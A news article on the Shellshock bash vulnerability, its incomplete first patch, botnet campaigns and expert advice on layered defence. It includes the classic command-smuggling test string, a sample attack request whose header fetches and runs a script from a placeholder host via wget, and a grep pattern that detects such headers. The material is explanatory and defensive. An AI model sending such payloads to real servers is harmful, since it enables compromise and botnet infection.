Shellshock attacks succeeded in part because the first patch was flawed and administrators rushed to install it.
According to a blog post by Imperva, hackers rapidly adapted the vulnerability into their exploit kits and ongoing attack campaigns; because the original patch proved ineffective, a second wave of exploits dovetailed into the first.
Barry Shteiman, director of security strategy at Imperva, said: “This vulnerability is one of the best examples of the risk to modern software systems that stems from third-party components. This is an inherent risk of modern systems, and once again we are reminded that patching is an ineffective approach to managing it.”
He said that patching failed in this instance because the first fix (for the original flaw, CVE-2014-6271) did not fully solve the problem, and a second vulnerability (CVE-2014-7169) was then identified and eventually fixed. However, many system administrators had already applied the first patch during their maintenance windows, which meant that re-fixing systems caused even more of a headache at that point.
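The incomplete first fix is easy to demonstrate with the widely circulated test string for the original flaw: a vulnerable bash executes the command smuggled after a function definition in an environment variable, while a patched bash simply ignores it. This is a quick sketch, not a formal audit of a host.

```shell
# Check whether this host's bash still executes trailing commands in an
# exported environment variable (the CVE-2014-6271 test string).
# On a patched bash, only "bash test complete" is printed; a vulnerable
# bash also prints "vulnerable".
env x='() { :;}; echo vulnerable' bash -c 'echo bash test complete'
```

Note that passing this check alone does not prove a host is safe: the follow-on parser bug tracked as CVE-2014-7169 had its own test strings and required the second round of patches.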
Research by Imperva found that soon after the Shellshock vulnerability was published, web servers were being attacked with different flavours of the exploit. “In a week period following public exposure of the vulnerability, we were able to record as many as 36,000 attack campaigns using the exploit,” he said.
In its analysis, Imperva detected at least four major mass-scan tools targeting the Shellshock vulnerability; malicious payloads were typically used to download a bot client script via the ‘wget’ command. The downloaded file then infected the web server and silently added it to a botnet.
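The attack pattern described above can be sketched as the shape of a typical probe seen in web server logs: a crafted header that abuses bash's function-export parsing to run a `wget` download. The host name, path and download URL below are placeholders for illustration, not real attack infrastructure.

```shell
# Illustrative only: the shape of a Shellshock probe against a CGI script.
# A CGI web server copies request headers into environment variables, so a
# vulnerable bash executes the command after the "() { :;};" prefix.
request='GET /cgi-bin/status HTTP/1.1
Host: victim.example
User-Agent: () { :;}; /bin/bash -c "wget http://bot.example/client.sh -O /tmp/c.sh; sh /tmp/c.sh"'

printf '%s\n' "$request"
```

Any header that reaches a bash-based CGI handler could carry the payload; the User-Agent was simply the most common choice because servers rarely validate it.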
He recommended mitigation via several mechanisms, such as detection of OS command injection, detection of access to susceptible URLs, detection of “bad players” and automated attacks, and detection of deviations in header values, since the attacks deviate from the normal values of common headers.
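The header-deviation check can be sketched very simply: Shellshock payloads all carry the distinctive `() {` function-definition prefix, which never appears in legitimate header values. The log format and entries below are made-up examples (using RFC 5737 documentation addresses); a real deployment would apply this as a WAF or IDS rule rather than a grep over logs.

```shell
# Minimal detection sketch: flag requests whose headers carry the
# "() {" prefix that Shellshock payloads rely on.
log='203.0.113.4 "GET / HTTP/1.1" "Mozilla/5.0"
198.51.100.7 "GET /cgi-bin/test HTTP/1.1" "() { :;}; /bin/bash -c wget"'

# -F treats the pattern as a fixed string, so no regex escaping is needed.
printf '%s\n' "$log" | grep -F '() {'
```

Only the second line is flagged; the first, a normal browser request, passes through untouched.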
Ken Westin, senior security analyst at Tripwire, said that Shellshock and other high-impact vulnerabilities have further illustrated the need for a layered security strategy implemented through multiple security controls.
He said: “If an organisation’s only security strategy is patching systems, they have already lost the battle: it is like bailing water on the Titanic given today’s threat landscape. Prevention is one side of the equation and can no longer be implemented manually, but requires implementation of a complete vulnerability management program leveraging automation and security intelligence.
“Organisations also need to detect security events and changes in their environment, as well as the ability to retroactively and quickly identify indicators of compromise to know if a vulnerable system was actually exploited and rapidly identify the scope of the compromise.”
Dwayne Melancon, CTO of Tripwire, said that failed patches are a risk, regardless of the issue. “There are a number of steps enterprises can take,” he said. “First, rehearse the patch in a pre-production environment to ensure that it doesn’t cause system instability, then deploy it into the production environment once you are confident it is stable. This process is recommended even in the event of an ‘emergency’ patch – you might abbreviate the testing you do, but deploying untested code into a production environment is very risky.
“Things can get more complex if a vendor releases an unsuccessful patch, but I recommend testing rollbacks or patch uninstalls as well. That way, if you find that a patch is incorrect or incomplete, you have more options. In many cases, vendors provide guidance about whether newer or updated patches should be applied over the top of the previous patch or not, and most modern installation processes can intelligently handle patch version resolution. However, in the case that a patch can’t be installed over the top of the previous iteration, you’ll be glad you tested the rollback process ahead of time.”